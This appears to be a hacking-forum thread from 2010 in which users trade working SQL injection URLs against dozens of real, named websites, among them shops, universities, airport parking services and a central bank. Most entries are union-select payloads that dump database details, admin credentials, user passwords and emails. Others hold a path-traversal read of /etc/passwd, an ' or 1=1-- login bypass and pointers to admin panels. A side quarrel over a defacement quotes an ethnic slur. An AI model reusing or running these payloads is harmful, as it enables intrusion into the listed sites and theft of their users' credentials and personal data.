http://www.unionradioirun.com/union.php?s=pro&s2=&pag=1&id=-197+union+select+database()--
this one is just out of boredom
Code:
http://www.znaki.chebnet.com/s10.php?id=-660+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7+--+
and this one seems to be a gaming portal
Yandex TIC: 210
Yandex.Rank: 4
Google PageRank: 3/10
Code:
http://www.gamesector.org/review.php?id=-141+union+select+1,2,concat_ws(0x3a,nick,icq,email ),4,5,6,7,8,9,10,11+from+gs_authors+--+
http://www.sw-rent.pl/index.php?id=00000103+or+(select+count(*)from(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(mid((select+version()),1,64),floor(rand(0)*2)))--
http://www2.kro.nl/boemerang/index.php?offset=876&logid=-175+UnIon+selECt+1,2,3,version%28%29,5,6,7,8,9,10, 11,12,13,14,15+--+
The dumbest table output)
http://www.linkdump.be/index.php?y=2006&m=2+and+1=0+union+select+version%28%29,2,3,4,5,6,7 ,8+--+
AVON
http://avon4u.ru/news.php?id=-443+and+1=2+union+select+1,2,concat(@@version,0x20 ,user(),0x20,database(),0x20,@@version_compile_os) ,4,5,6,7,8,9,10,11+--
version : 5.0.89-log
user : wtavon4u@localhost
database : wtavon4u
os : unknown-freebsd7.2
-PRIVAT-
01.09.2010, 13:36
http://www.rusdeutsch.eu/print_text.php?id=-3662+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,b enchmark%2815,@o:=CONCAT%28@o,0x0d0a,%28SELECT+con cat%28table_schema,0x2E,@i:=table_name%29+from+inf ormation_schema.tables+WHERE+table_name%3E@i+order +by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7, 8,9,0,1,2,3%20--
http://www.shefgoda.ru/?part=news&newsid=-36+union+select+1,concat_ws(0x3a,Login,Password,IC Q),3,4,5,6,7,8,9,0,1,2+from+chief_users
TIC 10 PR 4
-PRIVAT-
01.09.2010, 13:37
Hi everyone! The other day I found a vulnerable site. I noticed a link to the developer at the bottom, naturally followed it, and all the sites turned out to be... vulnerable! There were about 30 of them. But here was the problem: they all have the same hashes and, alas, nobody could decrypt them (on Antichat). Here is the developer's own site, webinstruments.ru (http://webinstruments.ru). Below is the SQL injection on it
http://webinstruments.ru/?part=news&newsid=-4+union+select+1,concat_ws%280x3a,ID,Login,Passwor d%29,3,4,5,6,7,8,9,0,1,2+from+FE_se_users--
TIC10(R2) PR2
http://ures.ru/?subsectionid=21+union+select+1,2,3,4,5,6,7,8,9,0, 1,2,3,4%20--
TIC10(R2)
http://www.bbp-alians.ru/?part=projects&movieid=-12+union+select+1,concat_ws%280x3a,ID,Login,Passwo rd,ICQ%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+a lliance_users--
TIC10(R2) PR2
http://www.map-wzm.ru/?part=news&newsid=-2+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3--
TIC10(R2) PR1
http://petersburg-tour.ru/?part=ny&subsectionid=-226+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20--
TIC40YC(R3) PR4
http://kino-focus.ru/?part=projects&elementid=17+union+select+1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5%20--
http://www.shefgoda.ru/?part=news&newsid=-36+union+select+1,concat_ws(0x3a,Login,Password,IC Q),3,4,5,6,7,8,9,0,1,2+from+chief_users --
TIC60(R3) PR3
http://www.moscowatch.ru/swissmade_brand.php?BrandId=-2+union+select+1,2,3--
TIC70YC(R3) PR5
http://www.goldenpuzzle.ru/?part=gallery§ion=code4&subsectionid=-1276+union+select+1,concat_ws%280x3a,Login,Passwor d,ICQ%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+puzzle_u sers--
TIC20(R2) PR20
http://www.fregat-blagodat.ru/?part=events&newsid=21+union+select+1,concat_ws(0x3a,Login,Pass word,ICQ),3,4,5,6,7,8,9,0,1,2+from+con_sltr__users--
TIC20(R2) PR2
http://www.pravdinskoe.ru/?part=news&newsid=29+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3%2 0--
TIC20(R2)
http://www.lmarsh.spb.ru/?part=portfolio&elementid=-34+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
http://www.mens-gifts.ru/?part=gallery&elementid=-28+union+select+1,2,3,4,5,6,7,8,9,0--
TIC10(R2) PR1
http://www.lightinside.ru/?part=catalog§ion=eglo&subsectionid=-16+union+select+1,2,3,4,5,6,7,8,9,0,1%20--
TIC10YC(R2) PR1
P.S.
These are not all the sites. See the rest in the developer's portfolio
Good luck!
Code:
http://www.formex.ru/catalog.php?id=-1003+union+select+table_name,2+from+information_sc hema.tables+limit+1,1--
stepashka_
01.09.2010, 13:51
Code:
http://www.elecboard.ru/ind.php?pn=2&id_categ=-49+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21--+
5.0.87-percona-highperf-logetrovich1975_123etrovich1975@localhost
TIC 10
PageRank 1
Code:
http://www.bbsplus.ru/ind.php?pn=9&id_categ=-13+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--+
5.1.39:yambi_bbsplus:yambi_bbsplus@localhost
PageRank 2
Code:
http://www.elecab.ru/board/ind.php?pn=15&id_categ=-41+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21--+
4.1.25-log:elecab43_elecab:elecab43_userel@localhost
TIC 20
PageRank 2
Code:
http://www.ceit.es/index.php?option=com_personal&view=detalle&trbId=-105+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,3,4,5,6,7%20from%20iv j_users%20limit%200,1--&catId=91&prsId=1&Itemid=25&lang=en
Username: jmuser@localhost
Version: 5.0.51a-24+lenny3
Database: ceit
Google PR: 6
http://eclassifieds.massagetoday.com/eclassified/detail.php?&id=7842'+group+by+19+/*+
there are 18 fields there,
can't work it through)
http://www.massagetoday.com/mpacms/mt/year.php?year=2009'+union+select+1,2+/*+
and here there is no access to information_schema.tables
Was looking for spare parts
http://www.rulu.ru/catalogs/index.html?brid=538&mdl=5020+and+ascii(lower(substring((select+table_n ame+from+information_schema.tables+limit+17,1),1,1 )))%3E1
2NorB:
I'm afraid to surprise you, but the 4.x branch never had information_schema.tables
Code:
http://www.best-doska.ru/ind.php?pn=229&id_typ=-191+union+select+1,2,3,4,5,6,group_concat(table_na me),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2,23,2 4+from+information_schema.tables+--+
SQL Injection
http://kappaepsilon.org/index.php?inc=news&opt=details&id=-44+union+select+1,concat(username,char(58),passwor d),3+from+admins
file downloader
http://kappaepsilon.org/open_files/file.php?file=../../../../../../../../../../../etc/passwd&name=antichat
PR-5
http://www.opened.ru/scenary/index.php?id=-207+union+select+1,2,3,4,5,6,7,8,group_concat(conc at(table_name,0x3a,table_rows)separator+0x3c62723e ),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,4+from+information_schema.tables--+
stepashka_
01.09.2010, 21:07
Code:
http://www.mckn.ru/gocka/ind.php?pn=4&id_categ=-2+union+select+1,2,3,4,5,UNHEX(HEX(concat_ws(0x3a, version(),database(),user()))),7,8,9,10,11,12,13,1 4,15--+
4.1.11-Debian_4sarge5-log:z59769_mckn:z59769_mckn@77.221.130.17
TIC 230
PageRank 2
Code:
http://www.aslalab.ru/cat/ind.php?pn=4&id_typ=-10+union+select+1,2,3,4,5,6,(concat_ws(0x3a,versio n(),database(),user())),8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23--+
5.1.43-log:wwwaslalabru_msql3:aslalab_msql3@fe93.hc.ru
PageRank 4
http://www.swiftnets.com/store/category.asp?CatID=2+and+1=@@version
in the login field
http://www.swiftnets.com/resellerlogin.asp
' or 1=1--
--------------
AJS.org
http://www.ajs.org/cart/thumbnail.asp?subject_id=2+union+select+1+from+use rs
PR-7
[Feldmarschall]
02.09.2010, 01:14
Bank of Peru [Banco Central de Reserva del Peru]
Code:
http://estadisticas.bcrp.gob.pe/index.asp?sFrecuencia='+or+1=(select top 1 table_name from information_schema.tables)--+
Microsoft SQL Server 7.00 - 7.00.1094 (Intel X86) May 29 2003 15:21:25 Copyright (c) 1988-2002 Microsoft Corporation Desktop Edition on Windows NT 4.0 (Build 1381: Service Pack 6)
educational institutions
Code:
http://ecirgroup.com/edu.php?id=-2+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8+--+
Code:
http://www.mmsshyj.com/wenming/edu.php?id=38&type=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9+--+
Code:
http://me.eng.kmitl.ac.th/news-edu.php?id=-28+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3+--+
Code:
http://cs.montclair.edu/php/profile.php?id=-111+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,version(),database(),user()),13,14,15,16+--+
http://www.infoflot.ru//newslenta/pheed.php?newsid=2866+and+1=0+union+select+1,table _name,3+from+information_schema.tables+--+
TIC:550
necr0log
02.09.2010, 14:26
http://www.bazar-auto.ru/view.php?s=list&type=cars&sost=2&cityid=&b_id=&m_id=&car%5Bcost1%5D=&car%5Bcost2%5D=3000'))+and+(select+email+from+tbl_ admin_users+where+id=2)=NULL+--+&qcurrency=USD&car%5Byear1%5D=&car%5Byear2%5D=&x=32&y=11
blind SQL injection
https://www28.safesecureweb.com/thunderwear/shop_detail.asp?Product_ID=64+union+select+1,2,3,4 ,5,6,7,8,9+from+msysaccessobjects
Terminolog
02.09.2010, 18:15
Code:
http://www.urbandictionary.com/define.php?term=unfathomable%20number-999.9+union+select+1,2,3,4-
TIC 350 PR 6
Code:
http://www.joblo.com/dvdclinic/index.php?id=1900-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31--
TIC 170 PR 6
*uNkN0Wn*
02.09.2010, 18:28
Code:
http://www.cosplay1.com/dtProduct.php?pId=-262+union+select+1,2,3,4,5,6,group_concat(username ,char(58),password),8,9,10,11,12,13,14+from+adminc 0sp+--+
http://www.wndesherbinin.com/product.php?c=8&p=8&cp=-4391+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22--
http://farayab.asia/products.php?page=id&id=-12+union+select+1,version(),3,4--
http://www.tangerinedream-music.com/download/cover.popup.php?pidp=-60+union+select+1,2,aes_decrypt(aes_encrypt(versio n(),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
http://www.colray-crafts.com/big.php?ProductID=-23263+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17
Terminolog
02.09.2010, 22:09
Code:
http://songsofpraise.org/song.php?songid=299-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4--
TIC 20
PR 4
--------------------------------------------------------
Code:
http://www.feldgrau.com/articles.php?ID=30-999.9+union+select+1,2,3,4,5,6,7,8--
TIC 40
PR 5
--------------------------------------------------------
Code:
http://www.sermonindex.net/modules/newbb/viewtopic.php?topic_id=28897&forum=36&2-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
TIC 10
PR 5
--------------------------------------------------------
Code:
http://www.standardmedia.co.ke/InsidePage.php?id=2000016504&cid=4-999.9+union+select+1,2,3,4,5--
TIC 70
PR 5
--------------------------------------------------------
Code:
http://www.megauploadbay.com/download.php?id=578970&name=besieged+1998+dvdrip+part3+rar-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--
TIC 10
PR 0
--------------------------------------------------------
Code:
http://www.ipodhacks.com/article.php?sid=2521-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--
TIC 30
PR 6
let's start slowly; I'll edit my post as I find more
Code:
http://www.menzies.utas.edu.au/information.php?Doo=ViewData&type=Person&ID=-59+union+select+1,2,3,4,5,6,concat(user_name,char( 58),user_password),8,9+from+mausdb.users+LIMIT%200 ,1+--+
first I worked the SQL injection, then started studying the site and realized there was no need to, since the admin's password and nick are also on this page http://www.menzies.utas.edu.au/information/
Code:
http://www.rblinds.com/information.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user())+--+
http://www.dfki.de/lt/card.php?id=-94+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://www.stepintub.com/states.php?id=-17+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7--
jacuzzi sales =)
online movie site
Code:
http://ventealcine.com/peliculas/videos/Ran.php?id=-731+union+select+1,concat(Nombre,char(58),Password ),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+vente2_v entealcine.Usuarios+--+
http://www.geniemove.com/states.php?stateid=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),5,6,7--
here everything is much simpler, and if I see a defacement on the site I will no longer post fully worked-out SQL injections (since everything here is in plain view, including the admin panel)
Code:
http://www.liposuctionlistings.com/link.php?id=-8+union+select+1,concat(username,char(58),Password ),3,4,5,6+from+admin+--+
Code:
http://www.musikstunden.ch/index.php?LinkID=1+union+select+1,concat_ws(0x3a,v ersion(),user(),database())/*
Version : 5.0.32
User : wsa@localhost
Database : wsa_musikstunden
Code:
http://saunaafricaonline.com/index.php?linkID=1+union+select+1,2,concat_ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18
MySQL : 5.1.37sp1
Database : adusu001_sauna
User : adusu001_sauna@216.239.136.31
Code:
http://www.keramikarte.de/shop/np/pheed.php?newsid=-24+union+select+1,2,table_name+from+information_sc hema.tables--+
For some reason I can't output anything from the tables...
Code:
http://www.keramikarte.de/shop/np/pheed.php?newsid=-24+union+select+1,2,group_concat(user_name)+from+c pg131_users+--+
*uNkN0Wn*
03.09.2010, 20:02
http://www.westcountry-networking.com/live/shop.php?1=1&nav=shop&cat=-63+union+select+1,group_concat(username,char(58),p assword),3,4,5+from+ecom_user+--+
Output is in the title
user() westcountrynetwo@localhost
version() 5.0.51a-24+lenny4
database() westcountrynetwo
Code:
http://www.intenso.de/kategorie.php?kategorie=-21%20UNION%20ALL%20SELECT%20CONCAT_WS%28CHAR%2832, 58,32%29,user%28%29,database%28%29,version%28%29%2 9,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,8 7,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102, 103,104,105,106,107,108,109,110,111,112,113,114,11 5,116,117,118,119,120,121,122,123,124,125,126,127, 128,129,130,131,132,133,134,135,136,137,138,139,14 0,141,142,143,144,145,146,147,148,149,150,151,152, 153,154,155,156,157,158,159,160,161,162,163,164,16 5,166,167,168,169,170,171,172,173,174,175--
intensode.1@localhost : intensode1 : 5.0.86-log
http://www.aeag.at/ce.php?id=-9+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)--
http://www.alt-erlaa.at/ce.php?id=-5+union+select+database()--
different domains( identical sites
PHP:
http://www.alexandrrybak.com/mov.php?id=-12+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3--
5.0.77:rybak:tarasdb@localhost
pr3 TIC 40
I didn't output the admin passwords since they are stored unencrypted and the admin panel is not hard to find, so I output an ordinary user instead
TIC 120
Code:
http://zoorinok.com.ua/art.php?id=26+and+1=0+union+select+1,2,concat(user _login,char(58),user_password),4+from+user+--+
online shop
TIC 50
Code:
http://www.superpovar.ru/art.php?id=-6+union+select+1,2,concat(username,char(58),user_p assword),4+from+h21mobi_forum.phpbb_users+limit+1, 1+--+
Code:
http://www.sport-clubs.ru/art.php?id=432+and+1=0+union+select+concat(login,c har(58),md5)+from+zorro_aaaa.users+limit+2,1+--+
here the output is in the title
Code:
http://www.purdes.com/blog/art.php?id=-164+union+select+1,2,3,4,5,6,7,8+--+
Code:
http://www.avtosssr.ru/art.php?id=-67+union+select+concat_ws(0x3a,version(),database( ),user()),2+--+
Code:
http://www.guevaragallery.com/art.php?id=2+and+1=0+union+select+1,concat_ws(0x3a ,version(),database(),user()),3,4+--+
*uNkN0Wn*
04.09.2010, 12:56
http://www.agenzia-limmobiliare.eu/vendita-fondo-commerciale-capannone-negozio.php?catID=-10+union+select+group_concat(nome,char(58),passwor d),2,3,4,5,6,7,8,9,10,11,12,13,14+from+immobiliare .user+--+
Output is at the very bottom.
http://www.farmasistemi.com/negozio.php?categoria=-6+union+select+1,2,group_concat(email,char(58),pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25+from+clienti+--+
user() root@localhost
version() 5.1.36-log
database() farmasistemi
http://bqshopping.com.br/loja.php?id=-58+union+select+1,2,table_name,4+from+information_ schema.tables+--+
user() bqshop_user@localhost
version() 5.0.91-community
database() bqshop_data
http://www.adoropromocao.com.br/loja.php?l=-198+union+select+1,2,3,4,5,6,7,8,version(),10,11,1 2,13,14+--+
user() promocao@localhost
version() 4.1.21-standard-log
database() adoropro_adorop
http://bleep.com/index.php?page=artist_details&artistid=-2342+union+select+1,2,group_concat(email,char(58), password,0x3c62723e),4,5,6,7,8,9,10+from+cms_user+--+
stepashka_
04.09.2010, 14:26
Code:
http://karcher-ural.ru/newss.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--+
5.0.90:b26649_karch:u26649@78.108.84.111
Code:
http://www.cto.nsk.su/newss.php?id=-21+union+select+concat_ws(0x3a,version(),database( ),user()),2,3--+
5.0.45-log:site_db:db_user@localhost
TIC 10
*uNkN0Wn*
04.09.2010, 16:21
http://www.svi04.de/xellplan/index.php?ID=7+union+select+group_concat(admin,0x3 a,admin_pass)+from+xp_sheets+--+
http://www.dp.ilsc.kuss-clubs.de/index.php?ID=415+union+select+group_concat(admin,0 x3a,admin_pass)+from+xp_sheets+--+
http://www.berlinschild1.kilu.de/xellplan-1.2/index.php?ID=16+union+select+group_concat(admin,0x 3a,admin_pass)+from+xp_sheets+--+
http://www.svinzlingen.de/xellplan/view.php?ID=2+union+select+group_concat(admin,0x3a ,admin_pass)+from+xp_sheets+--+
http://www.dp.ilsc.kuss-clubs.de/view.php?ID=299+union+select+group_concat(admin,0x 3a,admin_pass)+from+xp_sheets+--+
http://datasphere.de/plan/log.php?ID=29+union+select+1,2,3,group_concat(admi n,0x3a,admin_pass)+from+xp_sheets+--+
http://www.pinoyjokes.net/my/index.php?sbjoke_id=-505+union+all+select+1,2,3,4,concat(sbadmin_name,0 x3a,sbadmin_pwd),6,7,8,9,10,11+from+sbjks_admin--
http://www.fikra.tv/index.php?sbjoke_id=-7522+union+all+select+1,2,3,4,concat(sbadmin_name, 0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_a dmin--
Output is in the title
let's begin
Code:
http://www.sale-info.ru/lot.php?id=-108+union+select+1,2,concat(user_login,char(58),us er_pass),4,5,6,7,8,9,10,11,12+from+new_users+--+
Los Angeles International Airport
passwords are in plaintext
Code:
http://www.airport-la.com/parking/lot.php?id=-7+union+select+1,2,3,concat(email,char(58),passwor d),5,6,7,8,9,10,11,12,13,14+from+partners+--+
here the passwords are not stored in the DB, so I just output this
Code:
http://www.zagorodny-dom.ru/lot.php?id=-246+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10+--+
here the passwords are in plaintext too
Code:
http://www.cincinnatiparking.info/lot.php?id=-18+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10,11,12+from+parking.users+--+
or like this, outputting the admin account and hash
Code:
http://www.cincinnatiparking.info/lot.php?id=-18+union+select+1,concat(user_login,char(58),user_ pass),3,4,5,6,7,8,9,10,11,12+from+wordpress3.wp_02 n0c4_users+--+
PHP:
http://www.indiajournal.com/pages/event.php?id=-11753'union+select+1,concat_ws(0x3a,version(),data base(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38+--+
http://www.indiajournal.com/pages/event.php?id=-11753'union+select+1,table_name,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38+from+information_ schema.tAbLes+limit+33,1+--+
5.1.39-log:ij:ijuser@apache2-downer.warsaw.dreamhost.com
TIC 10 PR5
PHP:
http://metronics.ru/good.php?id=-973347913+union+select+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6,7,8,9,10,11--
http://metronics.ru/good.php?id=-973347913+union+select+1,concat(login),3,4,5,6,7,8 ,9,10,11+from+admin--
http://metronics.ru/admin/login.php
4.1.25-log:wwwmetronicsru:metronic@localhost
TIC 80 PR3
well, I got interrupted, I'll continue here
San Francisco International Airport
Code:
http://www.airportsfo.org/parking/lot.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13+--+
Code:
http://www.romancecollection.com/auction/lot.php?id=1146+and+1=0+union+select+1,2,3,4,conca t(emails,char(58),rows),6,7,8+from+d60577836.rc_se ttings%20+--+
Code:
http://www.ducky-games.com/lot.php?id=-271+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12+--+
http://peticije.org/page.petition.sign.php?id=-1606+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os)--
everything is output in the print version
http://murashka.com.ua/cms/card.php?id=3+and+1=2+union+select+1,user(),3,4,5, 6,7,8,9,10--&print=1
PHP:
http://www.cartagenamarina.es/weather.php?id=-3+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,230,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,9 4,95,96,97,98,99,100,101,102,103,104,105,106--
PHP:
http://www.econotrav.com/weather.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),4,5,6--
PHP:
http://www.econotrav.com/admin
I could not crack the admin hash
*uNkN0Wn*
05.09.2010, 01:36
http://www.pinoyjokes.net/my/index.php?sbjoke_id=-505+union+all+select+1,2,3,4,concat(sbadmin_name,0 x3a,sbadmin_pwd),6,7,8,9,10,11+from+sbjks_admin--
http://www.raytrace.net/products.php?id=-22+union+select+1,2,3,4,5,6,7,8,group_concat(user, char(58),password,0x3c62723e),10,11,12,13,14,15,16 ,17,18+from+mysql.user+--+
http://www.averyindia.co.in/products.php?id=-247+union+select+1,2,3,version(),5,6,7,8,9+--+
http://www.gemreplica.com/products.php?id=-55+union+select+1,2,group_concat(username,char(58) ,password,0x3c62723e),4,5,6,7,8,9+from+admininfo+--+
http://harmony.musigi-dunya.az/rus/archclouselist.asp?iss=12+union+select+1,2,3+from+ msysaccessobjects
https://www.mirvaritravel.az/v2/rez3.asp?id=440+and+1=@@version
http://www.sarayevim.com/rus/ilan_yazdir.asp?id=6+and+row(1,2)in(select+count(* ),concat((select+concat_ws(0x3a,@@version,@@versio n_comment,@@version_compile_machine,@@version_comp ile_os)+from+information_schema.tables+limit+20,1) ,0x3a,floor(rand(0)*2))as+a+from+information_schem a.tables+x+group+by+a)
http://www.filmiran.org/pages/showdetailsnews.asp?offset=399&IDN=36+union+select+1,2,3,4,5,6,7,8,9,10+from+msys accessobjects
http://www.peterfige.com/dvds.php?added=1&dvd=2+and+substring(version(),1,1)=3
poker
PHP:
http://www.jeux-poker-en-ligne.com/salle-poker.php?id=-8+order+by+27--
migueli_zerbino@72.41.255.210 4.1.20-max-log migueli_casino
found neither logins nor passwords here =(
PHP:
http://www.gppoker.be/agenda-gp-poker.php?id=-11+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5--&PHPSESSID=b79746845571ef3b7119d794e744fc90
5.0.90-log:gppokergadmin:gppokergadmin@10.0.95.102c-linux-gnu
PHP:
http://www.fr-poker-online.com/poker.php?ID=-32+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10, 11--
5.0.90-log:frpokerofrance:frpokerofrance@10.0.45.53c-linux-gnu
http://www.renewal-avto.ru/info.php?id=11+and+1=0+union+select+1,2,3,4,concat (login,char(58),password),6,7+from+avtorw.users+--+
and the admin panel http://www.renewal-avto.ru/admin
PHP:
http://www.funnyboss.com/friend.php?id=-52+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8,9,10--
5.0.51a-24+lenny2:funny:ccole@localhost:debian-linux-gnu
PHP:
http://www.pakvisit.com/friend.php?id=53+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
PHP:
http://www.synco.ru/razdel.php?id=-183+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4--
5.0.83-log:synco_db:synco@misantrop2
http://www.kamosline.ru/articles/news/detail.php?ID=8169+and+1=0+UnIon+selECt+1,2,3,4,5, 6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32+--+
TIC: 20
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,version(), 4,5,6,7,8,9,10,11,12,13,14,15+--+
TIC: 50
http://www.maxipool.ru/articles_view.php?id=1+and+1=0+union+select+1,grou p_concat(table_name),3+from+information_schema.tab les--+
Google PageRank: 2
http://paritetbk.ru/?vs=home&page=foto&xx=1&razd_id=59+group+by+4+--+
http://www.smolensk-i.ru/view_article.php?news_id=234+and+1=0+union+select+ 1,2,3,version(),5,6,7+--+
TIC: 20 Google PageRank: 3
http://www.fordimola.ru/?menu_id=1&page_id=656+group+by+7+--+
TIC: 60
http://www.perepelcina.com/index.php?link=2&id=71+and+1=0+union+select+version(),2,3,4,5,6,7,8 ,9,10+--+
TIC: 20 Google PageRank: 1
http://www.realtaim.ru/catalog?item_id=72+union+select+1,2,3,4,5,6,7,8,9, 10,11,12+--+
TIC: 110 Google PageRank: 3
http://www.detki.ru/?page=-5+union+select+1,2,group_concat(table_name),4+from +information_schema.tables--+
TIC: 190 Google PageRank: 4
http://www.rus-vent.ru/?menu=page&id=21+group+by+2+--+
TIC: 80 PR: 3
http://www.garden-center.ru/morenews.php?mode=full&id=28+and+1=0+UnIon+selECt+1,group_concat%28table_ name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26+from+information_schema.tab les--+&marker=%CD%EE%E2%EE%F1%F2%E8
TIC: 10 PR: 2
http://www.kiddypages.ru/index.php?item_full&t=import&id=-117+UnIon+selECt+1,group_concat%28table_name%29,3, 4,5,6,7,8,9,10,11,12,13,14,15+from+information_sch ema.tables+where+table_Schema=0x6b6964647970616765 73+--+
TIC: 110
Kusto said:
http://www.renewal-avto.ru/info.php?id=11+and+1=0+union+select+1,2,3,4,concat (login,char(58),password),6,7+from+avtorw.users+--+
and the admin panel http://www.renewal-avto.ru/admin
can you explain to me WHY THE HELL YOU HAD TO DEFACE the site, and with a link to achat on top of that???
Kusto said:
can you explain to me
WHY THE HELL YOU HAD TO DEFACE the site, and with a link to achat on top of that???
but it's so cool, dick +10 cm
though I have defaced 5 sites myself (over all time), only my own, and even that out of anger =)
Kusto said:
can you explain to me
WHY THE HELL YOU HAD TO DEFACE the site, and with a link to achat on top of that???
Code:
We are from Azerbaijan. Fuck you armenia!
I'm afraid they will stay the same ridiculous lamers all their lives
99% the defacer is k2b1~ aka LokbatanLi, who was banned for inappropriate behaviour and for defacing sites that other people had worked out
P.S. don't make me angry with your stupid nationalist defacements, or it will end badly!
*uNkN0Wn*
05.09.2010, 14:24
http://www.protexin.com/animal/products.php?id=-6+union+select+group_concat(d_email,0x3c62723e)+fr om+customer_orders+--+
PR - 4
http://www.sammygs.com/products.php?id=-6+union+select+1,group_concat(username,char(58),pa ssword,char(58),0x3c62723e),3,4,5,6,7,8+from+admin +--+
PR - 3
http://www.nbjm-sprayer.com/products.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,version(),18,19,20,21,22+--+
PR - 4
http://www.mahindraaustralia.com/products.php?act=viewSeries&id=-6+union+select+1,version(),3,4,5,6,7,8,9,10+--+
PR - 4
http://www.regalrentals.co.za/products.php?id=-6+union+select+1,2,group_concat(username,char(58), passwd)+from+admin+--+
PR - 2
http://vision-egy.net/products.php?id=-6+union+select+1,version(),3+--+
And there is nothing to output
http://www.everyway-medical.com/products.php?id=6=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version( ),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+
PR - 3
Konqi said:
Code:
We are from Azerbaijan. Fuck you armenia!
I'm afraid they will stay the same ridiculous lamers all their lives
99% the defacer is k2b1~ aka LokbatanLi, who was banned for inappropriate behaviour and for defacing sites that other people had worked out
